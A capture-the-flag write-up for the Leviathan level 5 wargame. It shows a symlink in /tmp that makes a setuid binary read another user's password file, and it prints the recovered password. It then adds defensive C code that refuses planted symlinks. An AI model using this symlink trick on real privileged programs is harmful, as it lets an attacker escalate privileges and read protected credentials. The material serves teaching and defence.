Level 05

Testing the found setuid file
$ ./leviathan5
Cannot find /tmp/file.log
ltrace
Whereas the output of strace yielded no useful information about the executable, the output of ltrace showed:
leviathan5@gibson:~$ ltrace ./leviathan5
__libc_start_main(0x8049206, 1, 0xffffd5f4, 0 <unfinished ...>
fopen("/tmp/file.log", "r") = 0
puts("Cannot find /tmp/file.log"Cannot find /tmp/file.log) = 26
exit(-1 <no return ...>
+++ exited (status 255) +++
fopen() is unable to find the file the program is coded to read. You are able to write to /tmp, so creating a symlink to the password file should allow you to read it:
$ ln -s /etc/leviathan_pass/leviathan6 /tmp/file.log
$ ./leviathan5
YZ55XPVk2l
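The defensive counterpart, as an added example that is not part of the original write-up or the leviathan5 binary: one way a privileged program could open a file in a world-writable directory without following a planted symlink. The function names, the temp-directory fixture and the owner/link-count policy are assumptions for illustration.

```c
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hypothetical hardened replacement for fopen("/tmp/file.log", "r"):
 * returns a read-only fd, or -1 if the path is not a trustworthy file. */
int open_log_safely(const char *path, uid_t expected_owner)
{
    /* O_NOFOLLOW makes open() fail (ELOOP) if the last component is a symlink. */
    int fd = open(path, O_RDONLY | O_NOFOLLOW | O_CLOEXEC);
    if (fd < 0)
        return -1;

    /* fstat() the descriptor we hold, not the path, to avoid a check/use race. */
    struct stat st;
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) ||
        st.st_uid != expected_owner || st.st_nlink != 1) {
        close(fd);
        return -1;
    }
    return fd;
}

/* Constructed fixture: a private temp dir holding a regular file and a
 * symlink to it. Returns 1 if the file is accepted and the symlink refused. */
int demo_symlink_refused(void)
{
    char dir[] = "/tmp/symdemoXXXXXX", target[64], lnk[64];
    if (!mkdtemp(dir))
        return -1;
    snprintf(target, sizeof target, "%s/secret", dir);
    snprintf(lnk, sizeof lnk, "%s/file.log", dir);

    FILE *f = fopen(target, "w");
    if (!f) return -1;
    fputs("constructed-secret\n", f);
    fclose(f);
    if (symlink(target, lnk) != 0) return -1;

    int good = open_log_safely(target, geteuid());
    int bad = open_log_safely(lnk, geteuid());
    if (good >= 0) close(good);
    unlink(lnk); unlink(target); rmdir(dir);
    return good >= 0 && bad < 0;
}
```

O_NOFOLLOW only covers the final path component, so the ownership and link-count checks on the open descriptor still matter when the parent directory is writable by other users.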